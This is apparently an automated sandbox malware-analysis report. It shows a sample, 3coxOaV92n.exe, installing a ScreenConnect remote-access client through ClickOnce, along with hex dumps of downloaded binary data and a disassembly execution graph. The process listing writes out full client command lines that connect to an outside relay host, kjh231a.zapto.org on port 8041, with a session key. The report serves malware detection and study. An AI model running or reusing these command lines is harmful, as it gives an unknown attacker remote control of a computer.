                                                                                                                                                                                                                                                      Data Ascii: o.{To*0b{To,M{Z(o{To{T{Toto&{Toz(<*(<*0Grp%3%{To({To..'+5{Z(o-"(so+{Z
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 70 28 b0 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70 00 00 00 62 00 00 11 73 3f 08 00 06 0a 06 02 7d 94 03 00 04 02 03 28 28 04 00 0a 06 02 28 29 04 00 0a 28 b1 00 00 2b 7d 93 03 00 04 02 28 29 04 00 0a 26 02 28 2a 04 00 0a 6f 2b 04 00 0a 02 28 2a 04 00 0a 02 7b 89 00 00 04 06 fe 06 40 08 00 06 73 2c 04 00 0a 28 b2 00 00 2b 06 fe 06 41 08 00 06 73 2d 04 00 0a 28 b3 00 00 2b 28 b4 00 00 2b 6f 2e 04 00 0a 2a c2 02 28 2f 04 00 0a 02 7e 30 04 00 0a 28 31 04 00 0a 02 20 02 60 00 00 17 28 32 04 00 0a 02 02 fe 06 e0 01 00 06 73 33 04 00 0a 28 34 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02
                                                                                                                                                                                                                                                      Data Ascii: p(+}*0pbs?}((()(+}()&(*o+(*{@s,(+As-(+(+o.*(/~0(1 `(2s3(4*{*"}*{*"}*{*"}*{*"}*
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 6f c7 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28 ab 02 00 06 2c 07 02 28 ab 02 00 06 2a 02 28 94 02 00 06 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 a0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a7 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a7 02 00 06 2a 02 6f 1e 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 9e 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 9e 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a5 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a5 02 00 06 2a 02 6f 1d 04 00 0a 2a d6 02 28 67 05 00 0a 2d 0f 02 28 a2 02 00 06 2c 07 02 28 a2 02 00 06 2a 02 7b
                                                                                                                                                                                                                                                      Data Ascii: o*z{,(,(*(*0Q(g-((h,(*{,((h,(*o*0Q(g-((h,(*{,((h,(*o*(g-(,(*{
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00 00 00 00 02 03 04 05 0e 04 28 7c 03 00 06 02 73 0b 06 00 0a 7d 38 01 00 04 02 02 fe 06 87 03 00 06 73 82 01 00 0a 28 0c 06 00 0a 02 7b 38 01 00 04 02 fe 06 88 03 00 06 73 82 01 00 0a 6f 0d 06 00 0a 02 02 fe 06 89 03 00 06 73 9e 01 00 0a 28 9f 01 00 0a 02 02 fe 06 8a 03 00 06 73 82 01 00 0a 28 0e 06 00 0a 2a 32 02 7b 38 01 00 04 6f 0f 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 10 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33
                                                                                                                                                                                                                                                      Data Ascii: }7*0d(|s}8s({8sos(s(*2{8o*6{8o*0){:(t|:(P+3*0){:(t|:(P+3
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b3 07 00 0a 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b4 07 00 0a 1f 20 17 28 b5 07 00 0a 7d 3b 05 00 04 06 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 a1 04 00 0a 1f 20 73 b6 07 00 0a 7d 3d 05 00 04 06 14 7d 3c 05 00 04 02 06 7b 39 05 00 04 06 fe 06 82 0a 00 06 73 96 07 00 0a 28 9a 01 00 2b de 39 06 7b 3b 05 00 04 2c 0b 06 7b 3b 05 00 04 6f 22 00 00 0a dc 06 7b 3a 05 00 04 2c 0b 06 7b 3a 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 66 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 b0 01 00 06 02 20 16 22 00 00 17 28 32 04 00 0a 02
                                                                                                                                                                                                                                                      Data Ascii: 9o({9o( (};{9o( s}=}<{9s(+9{;,{;o"{:,{:o",o"(f&*4iA5$0J( "(2
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 38 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 38 05 00 06 80 0f 02 00 04 1f 21 1f 10 28 38 05 00 06 80 10 02 00 04 1f 20 1f 10 28 38 05 00 06 80 11 02 00 04 20 c8 00 00 00 28 37 05 00 06 80 12 02 00 04 d0 88 00 00 02 28 bf 00 00 0a 6f 96 08 00 0a 6f 97 08 00 0a 7e 83 05 00 04 fe 06 d9 0a 00 06 73 5f 01 00 0a 28 d2 01 00 2b 7e 83 05 00 04 fe 06 da 0a 00 06 73 5f 01 00 0a 28 21 00 00 2b 0c 28 98 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 44 05 00 06 28 c6 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 98 08 00 0a 02 6f 44 05 00 06 28 c6 04 00 06 7e aa 00 00 0a 02 6f b2 03 00 0a 6f 99 08 00 0a 2a 2e 28 c5 04 00 06 6f 61 05 00 06 2a 2e 28 c5 04 00 06 6f 47 05 00 06 2a 2e 28 c5 04 00 06 6f 4d 05
                                                                                                                                                                                                                                                      Data Ascii: (8(8!(8 (8 (7(oo~s_(+~s_(!+(%-&(oD(*~**(oD(~oo*.(oa*.(oG*.(oM
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 00 80 00 00 5f 16 fe 03 2a 3e 1f fe 73 0b 0c 00 06 25 02 7d 35 06 00 04 2a 00 00 00 13 30 03 00 59 00 00 00 3f 01 00 11 73 be 0b 00 06 0a 06 03 7d f9 05 00 04 06 7b f9 05 00 04 28 15 02 00 2b 2d 02 15 2a 02 28 10 06 00 06 06 fe 06 bf 0b 00 06 73 a4 09 00 0a 28 16 02 00 2b 7e d0 05 00 04 25 2d 17 26 7e cf 05 00 04 fe 06 8d 0b 00 06 73 76 05 00 0a 25 80 d0 05 00 04 16 28 22 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 40 01 00 11 73 a5 09 00 0a 0a 06 03 7d a6 09 00 0a 02 06 fe 06 a7 09 00 0a 73 a8 09 00 0a 15 28 17 02 00 2b 7e a9 09 00 0a 25 2d 17 26 7e aa 09 00 0a fe 06 ab 09 00 0a 73 ac 09 00 0a 25 80 a9 09 00 0a 28 18 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 41 01 00 11 7e ad 09 00 0a 72 16 40 00 70 02 8c 65 00 00 01 28 23 06 00 0a 6f ae 09 00 0a 0a
                                                                                                                                                                                                                                                      Data Ascii: _*>s%}5*0Y?s}{(+-*(s(+~%-&~sv%("+*0E@s}s(+~%-&~s%(+*0.A~r@pe(#o
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 87 02 00 04 02 28 46 00 00 0a 2a 1e 02 7b 84 02 00 04 2a 1e 02 7b 85 02 00 04 2a 1e 02 7b 86 02 00 04 2a 1e 02 7b 87 02 00 04 2a 32 02 7b 82 02 00 04 6f 7e 06 00 0a 2a 36 02 7b 83 02 00 04 03 6f 18 0b 00 0a 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a e6 02 28 d7 00 00 0a 02 20 06 20 00 00 17 28 32 04 00 0a 02 16 28 a2 00 00 0a 02 17 6f fb 01 00 0a 02 17 28 19 0b 00 0a 02 28 1a 0b 00 0a 02 28 ba 01 00 0a 28 f8 01 00 0a 2a 76 02 28 29 08 00 0a 25 20 00 00 00 80 6f eb 04 00 0a 25 20 88 00 00 00 6f ec 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 90 01 00 11 0f 01 28 ef 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f2 01 00 0a 28 1b 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f2 01 00 0a 28 86 00 00 0a 73 41 05 00 0a 2a 02 02 28 f0 01 00 0a 02 28 ec 01 00 0a 02 28
                                                                                                                                                                                                                                                      Data Ascii: (F*{*{*{*{*2{o~*6{o*{*"}*( (2(o((((*v()% o% o*0(,+((((,((sA*(((


                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:13:29:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\3coxOaV92n.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\3coxOaV92n.exe"
                                                                                                                                                                                                                                                      Imagebase:0xac0000
                                                                                                                                                                                                                                                      File size:83'360 bytes
                                                                                                                                                                                                                                                      MD5 hash:8BAAA006991B70783ED369D3CA853CA3
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:13:29:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                      Imagebase:0x2a171bc0000
                                                                                                                                                                                                                                                      File size:24'856 bytes
                                                                                                                                                                                                                                                      MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
                                                                                                                                                                                                                                                      Imagebase:0xf0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748
                                                                                                                                                                                                                                                      Imagebase:0xf0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:13:29:14
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:13:29:16
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:13:29:50
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:13:29:51
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                      Imagebase:0xc60000
                                                                                                                                                                                                                                                      File size:95'520 bytes
                                                                                                                                                                                                                                                      MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:13:29:51
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                      Imagebase:0xc60000
                                                                                                                                                                                                                                                      File size:95'520 bytes
                                                                                                                                                                                                                                                      MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                      Start time:13:29:52
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User"
                                                                                                                                                                                                                                                      Imagebase:0x150000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:13:29:54
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:2.2%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:3.8%
                                                                                                                                                                                                                                                        Total number of Nodes:1465
                                                                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                                                                        execution_graph 6126 ac452d 6134 ac5858 6126->6134 6128 ac4537 6129 ac4541 6128->6129 6130 ac44a8 _abort 15 API calls 6128->6130 6131 ac4549 6130->6131 6132 ac4556 6131->6132 6139 ac4559 6131->6139 6135 ac5741 _abort 5 API calls 6134->6135 6136 ac587f 6135->6136 6137 ac5897 TlsAlloc 6136->6137 6138 ac5888 _ValidateLocalCookies 6136->6138 6137->6138 6138->6128 6140 ac4569 6139->6140 6141 ac4563 6139->6141 6140->6129 6143 ac58ae 6141->6143 6144 ac5741 _abort 5 API calls 6143->6144 6145 ac58d5 6144->6145 6146 ac58ed TlsFree 6145->6146 6147 ac58e1 _ValidateLocalCookies 6145->6147 6146->6147 6147->6140 6148 ac142e 6151 ac2cf0 6148->6151 6150 ac143f 6152 ac44a8 _abort 15 API calls 6151->6152 6153 ac2d07 _ValidateLocalCookies 6152->6153 6153->6150 5947 ac9beb 5948 ac9c04 __startOneArgErrorHandling 5947->5948 5949 ac9c2d __startOneArgErrorHandling 5948->5949 5951 aca1c4 5948->5951 5952 aca1fd __startOneArgErrorHandling 5951->5952 5954 aca224 __startOneArgErrorHandling 5952->5954 5960 aca495 5952->5960 5955 aca267 5954->5955 5956 aca242 5954->5956 5971 aca786 5955->5971 5964 aca7b5 5956->5964 5959 aca262 __startOneArgErrorHandling _ValidateLocalCookies 5959->5949 5961 aca4c0 __raise_exc 5960->5961 5962 aca6b9 RaiseException 5961->5962 5963 aca6d1 5962->5963 5963->5954 5965 aca7c4 5964->5965 5966 aca838 __startOneArgErrorHandling 5965->5966 5968 aca7e3 __startOneArgErrorHandling 5965->5968 5967 aca786 __startOneArgErrorHandling 15 API calls 5966->5967 5970 aca831 5967->5970 5969 aca786 __startOneArgErrorHandling 15 API calls 5968->5969 5968->5970 5969->5970 5970->5959 5972 aca7a8 5971->5972 5973 aca793 5971->5973 5975 ac47f9 _free 15 API calls 5972->5975 5974 aca7ad 5973->5974 5976 ac47f9 _free 15 API calls 5973->5976 5974->5959 5975->5974 5977 aca7a0 5976->5977 5977->5959 5978 ac33e5 5979 ac33f7 5978->5979 5981 ac33fd 5978->5981 5982 ac3376 5979->5982 5983 ac33a0 5982->5983 5984 ac3383 5982->5984 5983->5981 5985 ac339a 5984->5985 5986 ac4869 _free 15 API calls 5984->5986 5987 ac4869 _free 15 API calls 5985->5987 5986->5984 5987->5983 5748 ac5ba6 5749 ac5bd7 5748->5749 5750 ac5bb1 5748->5750 5750->5749 5751 ac5bc1 FreeLibrary 5750->5751 5751->5750 6154 ac6026 6157 ac602b 6154->6157 6156 ac604e 6157->6156 6158 ac5c56 6157->6158 6159 ac5c85 6158->6159 6160 ac5c63 6158->6160 6159->6157 6161 ac5c7f 6160->6161 6162 ac5c71 DeleteCriticalSection 6160->6162 6163 ac4869 _free 15 API calls 6161->6163 6162->6161 6162->6162 6163->6159 6590 ac9160 6593 ac917e 6590->6593 6592 ac9176 6597 ac9183 6593->6597 6594 ac99d3 16 API calls 6595 ac93af 6594->6595 6595->6592 6596 ac9218 6596->6592 6597->6594 6597->6596 5752 ac56a1 5753 ac56ac 5752->5753 5755 ac56d5 5753->5755 5756 ac56d1 5753->5756 5758 ac59b3 5753->5758 5763 ac56f9 5755->5763 5759 ac5741 _abort 5 API calls 5758->5759 5760 ac59da 5759->5760 5761 ac59f8 InitializeCriticalSectionAndSpinCount 5760->5761 5762 ac59e3 _ValidateLocalCookies 5760->5762 5761->5762 5762->5753 5764 ac5725 5763->5764 5765 ac5706 5763->5765 5764->5756 5766 ac5710 DeleteCriticalSection 5765->5766 5766->5764 5766->5766 5988 ac8ce1 5989 ac8d01 5988->5989 5992 ac8d38 5989->5992 5991 ac8d2b 5994 ac8d3f 5992->5994 5993 ac8da0 5996 ac988e 5993->5996 6001 ac9997 5993->6001 5994->5993 5995 ac8d5f 5994->5995 5995->5996 5999 ac9997 16 API calls 5995->5999 5996->5991 6000 ac98be 5999->6000 6000->5991 6002 ac99a0 6001->6002 6005 aca06f 6002->6005 6004 ac8dee 6004->5991 6006 aca0ae __startOneArgErrorHandling 6005->6006 